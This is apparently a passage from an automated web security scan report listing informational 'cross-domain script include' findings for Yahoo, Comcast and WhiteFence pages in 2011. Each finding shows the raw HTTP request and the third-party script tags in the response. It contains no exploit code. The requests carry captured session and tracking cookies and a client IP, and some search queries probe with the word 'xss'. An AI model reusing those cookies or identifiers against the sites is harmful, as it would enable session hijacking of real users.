<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.8.1/build/yahoo-dom-event/yahoo-dom-event.js&d/lib/yui/2.5.2/build/container/container-min.js&qf/static/js/4.3.21/overlay-201105050424.js&qf/static/js/4.3.21/ult-strip-201105050424.js&d/lib/yui/2.5.2/build/connection/connection-min.js&d/lib/yui/2.5.2/build/cookie/cookie-beta-min.js&d/lib/yui/2.5.2/build/json/json-min.js&qf/static/js/4.3.21/util-201105050424.js&d/lib/yui/2.5.2/build/get/get-min.js&d/lib/yui/2.5.2/build/history/history-min.js&qf/static/js/4.3.21/mvc-201105050424.js&qf/static/js/4.3.21/srp-mvc-201105050424.js&qf/static/js/4.3.21/class-cycler-201105050424.js&d/lib/yui/2.5.2/build/dragdrop/dragdrop-min.js&d/lib/yui/2.5.2/build/animation/animation-min.js&d/lib/yui/2.5.2/build/slider/slider-min.js&qf/static/js/4.3.21/slider-201105050424.js&qf/static/js/4.3.21/rb-en-201105050424.js&d/lib/ult/ylc_1.9.js&qf/static/js/4.3.21/popup-201105050424.js&qf/static/js/4.3.21/header-201105050424.js&qf/static/js/4.3.21/location-srp-focus-201105050424.js&d/lib/uh/15/js/uh_rsa-1.0.9.js&d/lib/yui/2.5.2/build/autocomplete/autocomplete-min.js&qf/static/js/4.3.21/autocomplete-201105050424.js&qf/static/js/4.3.21/srp-saved-search-list-201105050424.js&qf/static/js/4.3.21/srp-save-search-201105050424.js&qf/static/js/4.3.21/srp-pagination-201105050424.js&qf/static/js/4.3.21/srp-refine-form-201105050424.js&qf/static/js/4.3.21/srp-map-toggler-201105050424.js&qf/static/js/4.3.21/srp-view-toggler-201105050424.js&qf/static/js/4.3.21/imageloader-201105050424.js&qf/static/js/4.3.21/srp-imageloader-201105050424.js&qf/static/js/4.3.21/srp-listing-201105050424.js&qf/static/js/4.3.21/srp-sort-control-201105050424.js&qf/static/js/4.3.21/ult-ylc-201105050424.js&qf/static/js/4.3.29/listing-ad-201105300129.js"></script>
...[SNIP]...

16.35. http://servicetips.whitefence.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servicetips.whitefence.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: servicetips.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.2.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "30ba8e6c26260d3f6ada8f96392cdebac6dc9072"
Server: TornadoServer/0.1
Content-Length: 25838
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 11:59:34 GMT
Connection: close

<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8" />
   <meta name="wa_lr" scheme="DMINSTR2" content="en-US" />
   <meta name="wa_lid" scheme="DMI
...[SNIP]...
<![endif]-->
   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
<!-- Omniture -->
   <script src="http://external.dmtracker.com/tags/vs.js"></script>
...[SNIP]...

16.36. http://shopping.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: shopping.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:06 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 71878


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<link rel="stylesheet" href="http://l.yimg.com/a/combo?yui/2.7.0/build/reset-fonts-grids/rese
...[SNIP]...
</script>
<script src="http://l.yimg.com/us.js.yimg.com/lib/yui/3.2.0/build/yui/yui-min.js"></script>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --> <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- #postdoc -->

<script type="text/javascript" src="http://l.yimg.com/a/combo?yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js&yui/2.7.0/build/imageloader/imageloader-min.js&shop/s2/sh_global_201002251741.js"></script>
...[SNIP]...

16.37. http://shopping.yahoo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search;_ylt=ApMQLGDYOT7QlJIA.L4LcHMEgFoB?p=xss+phone&did=0 HTTP/1.1
Host: shopping.yahoo.com
Proxy-Connection: keep-alive
Referer: http://shopping.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:58 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Cache-Control: private
Content-Length: 86025


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<link rel="stylesheet" href="http://l.yimg.com/a/combo?yui/2.7.0/build/reset-fonts-grids/rese
...[SNIP]...
</script>
<script src="http://l.yimg.com/us.js.yimg.com/lib/yui/3.2.0/build/yui/yui-min.js"></script>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved --> <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ono/ywa.js"></script>
...[SNIP]...
<!-- #postdoc -->

<script type="text/javascript" src="http://l.yimg.com/a/combo?yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js&yui/2.7.0/build/imageloader/imageloader-min.js&shop/s2/sh_global_201002251741.js&shop/s2/sh_listing_201010132254.js"></script>
...[SNIP]...

16.38. http://sitesearch.comcast.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitesearch.comcast.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; mbox=session#1315327839174-766376#1315330223|check#true#1315328423; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20s_dfa%3Dcomcastdotcomprod%7C1315330160518%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315330162478%3B; s_sess=%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20cf%3D0%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:11 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 18478
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
...[SNIP]...
</script>
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js?id=xpbar&highlight=comcastcom"></script>
...[SNIP]...

16.39. http://sports.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; MwPhCom_degraded_status=false; adxid=016e3b4e6615bdb5; YWP_VOLUME=0.5; spt_site=scorethin_league=nascar; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:08 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: keep-alive
Via: HTTP/1.1 r2.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 143040

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Yahoo! Sports - Sports News, Scores, Rumors, Fantasy Games, and more</title>
<meta h
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
<!-- APT Vendor: Doubleclick -->
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTEwNjlqYihnaWQkbkUxaDhVUERsQl9QQllwOVRtWVdpQU5ITWhkN2FrNW1Gb2dBRDBFcSxzdCQxMzE1MzEzMjg5MDQ4MDk5LHNpJDQ0NTc1NTEsdiQxLjAsYWlkJFJrTDVBRVBEbUt3LSxjdCQyNSx5YngkRk5vNlNOWjdBcC5WU0pwRk04TFZ0dyxyJDAscmQkMTZpbmZpODlwKSk/1/*http://global.ard.yahoo.com/SIG=15k06i807/M=999999.999999.999999.999999/D=sports/S=25664825:LREC/_ylt=Akopd_SvIN1lB31F8aANhAQ5nYcB/Y=YAHOO/EXP=1315320489/L=nE1h8UPDlB_PBYp9TmYWiANHMhd7ak5mFogAD0Eq/B=RkL5AEPDmKw-/J=1315313289124929/K=Fw3L9uhiwVsimoBmj_TrQg/A=3672358318799275418/R=0/X=6/*;ord=1315313289.124929?"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...

16.40. http://sports.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; MwPhCom_degraded_status=false; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r5.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 142465

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Yahoo! Sports - Sports News, Scores, Rumors, Fantasy Games, and more</title>
<meta h
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
</script><script src="http://ads.yimg.com/a/a/1-/jscodes/flash9/misc_9as2_20081114.js"></script>
...[SNIP]...
<!-- APT Vendor: Doubleclick -->
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWE0MWhzMChnaWQkTml2R01tS0lQRTdwQVJwalRsLndqUUZjTWhkN2FrNW1GZFVBQ0NoTSxzdCQxMzE1MzEzMTA5NjA3MTA0LHNpJDQ0NTc1NTEsdiQxLjAsYWlkJEVrUlZYVVBEbUswLSxjdCQyNSx5YngkNW1YdjU1YkhqWURLRTlCTFlxN3hiQSxyJDAscmQkMTZpczV1ZWFrKSk/1/*http://global.ard.yahoo.com/SIG=15ksi437m/M=999999.999999.999999.999999/D=sports/S=25664825:LREC/_ylt=AuXImj6wykRaku7iPAhaBYQ5nYcB/Y=YAHOO/EXP=1315320309/L=NivGMmKIPE7pARpjTl.wjQFcMhd7ak5mFdUACChM/B=EkRVXUPDmK0-/J=1315313109676703/K=Q.Og7BX4QADGwPLFVDWSpw/A=3672358318799275418/R=0/X=6/*;ord=1315313109.676703?"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...

16.41. http://sports.yahoo.com/mlb/recap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /mlb/recap

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; MwPhCom_degraded_status=false; adxid=016e3b4e6615bdb5; YWP_VOLUME=0.5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; spt_site=scorethin_league=nascar

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:19 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: keep-alive
Via: HTTP/1.1 r4.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 247599

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Lee tosses another gem, shuts out Braves - MLB - Yahoo! Sports</title>
<meta http-e
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx1kM0OgyAQhJ_IKqD8pA_TbIFULLCG1TT26av00F48bXbmy-xmJmoTZHj4cimsF5yz60SthYIr-fivuUA2Iq3F76pkqu8OldAGiLf7uiyYaXeUEYIfTvIuwBxhq9FKa9nXaEwJc7vR3CR0ddIIxTfL6BuyWOM1Gzg_oe3o7TPkg-oMFyfUHOyTapI0-oSJ8N4igvs-2LNBnp381TEobWodL4Tx2A038gO2NW8j.js?z&m"></script>
...[SNIP]...
<div id="ad-347035" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=954x60_spon&ymlb_rollup=news&page.allowcompete=yes&tile=1315313419813817&transactionID=1315313419813817"></script>
...[SNIP]...
<div id="ad-289494" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=160x600_bot&ymlb_rollup=news&page.allowcompete=yes&tile=1315313419813817&transactionID=1315313419813817"></script>
...[SNIP]...
</script><script src="http://ads.yimg.com/a/a/1-/jscodes/flash9/misc_9as2_20081114.js"></script>
...[SNIP]...
<div id="ad-745217" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=300x250_rgt&ymlb_rollup=news&page.allowcompete=yes&tile=1315313419813817&transactionID=1315313419813817"></script>
...[SNIP]...
</div>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/video/dash-players/yep-player.r169686;js/video/dash-players/dash-players.r176591;js/video/dash-players/dash-players-init.r174877.js?m"></script>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.9.0/build/yahoo/yahoo-min.js&d/lib/yui/2.9.0/build/event/event-min.js&d/lib/yui/2.9.0/build/dom/dom-min.js&d/lib/yui/2.9.0/build/imageloader/imageloader-min.js&d/lib/yui/2.9.0/build/get/get-min.js&d/lib/yui/2.9.0/build/connection/connection-min.js&d/lib/yui/2.9.0/build/animation/animation-min.js&d/lib/yui/2.9.0/build/json/json-min.js&d/lib/yui/2.9.0/build/container/container-min.js&d/lib/yui/2.9.0/build/element/element-min.js&d/lib/yui/2.9.0/build/cookie/cookie-min.js&d/lib/media/phugc/mwphcom_min_r142.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...

16.42. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 6
Proxy-Connection: keep-alive
Via: HTTP/1.1 r1.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 291643

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tiki Barber remains unemployed and sad - Shutdown Corner - NFL&nbsp;Blog - Yahoo! Spor
...[SNIP]...
</script>
<script charset="utf-8" src="http://l.yimg.com/j/assets/eJx9kOGOgyAQhJ9IRRSF3MOYLa6VVsAAXuPbH0gv8ZKzvyAz3yyzPHy1b6qipShJui0WRnSFVqZ0dd_zhn89zsho9bWJ32jCtS2tMSiDsuaaAaM0fEYe_n-3KZu8w9tk0WTJ9AhOzgN4r3yooqnydaCECMIpqbuGx0DbUFqnQCzqA5jgjydodzzhV-veSstEUhxODv18Tga4_SJdnmSfChPRc9YmZbYaB23HbcE_w4KST3RJ6RgjSXkpM9rXmfHSOgxzXr3rBU3iusCObshLnrs4WNWY_oHGfBK2JeT54vCnZbdbVnj9bqu1NdXu1yI2PM4R3AKJER1vL5jcwNiAhQYD97zGh8AEEm_xZyLG65bXF5hCUazKFMGBfCpzT1MJY_wH0NjgNg,,.js?z&m"></script>
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx1kM0OgyAQhJ_IKqD8pA_TbIFULLCG1TT26av00F48bXbmy-xmJmoTZHj4cimsF5yz60SthYIr-fivuUA2Iq3F76pkqu8OldAGiLf7uiyYaXeUEYIfTvIuwBxhq9FKa9nXaEwJc7vR3CR0ddIIxTfL6BuyWOM1Gzg_oe3o7TPkg-oMFyfUHOyTapI0-oSJ8N4igvs-2LNBnp381TEobWodL4Tx2A038gO2NW8j.js?z&m"></script>
...[SNIP]...
</script><script id="load_wrapper" type="text/javascript" src="http://mi.adinterax.com/wrapper.js"></script>
...[SNIP]...
<!--Vendor: Factor TG, Format: Pixel, IO: 774106--><SCRIPT LANGUAGE="JavaScript" SRC="http://as1.suitesmart.com/99917/G15493.js?GID=15493"></SCRIPT>
...[SNIP]...
</script><script id="load_wrapper" type="text/javascript" src="http://mi.adinterax.com/wrapper.js"></script>
...[SNIP]...
</div>

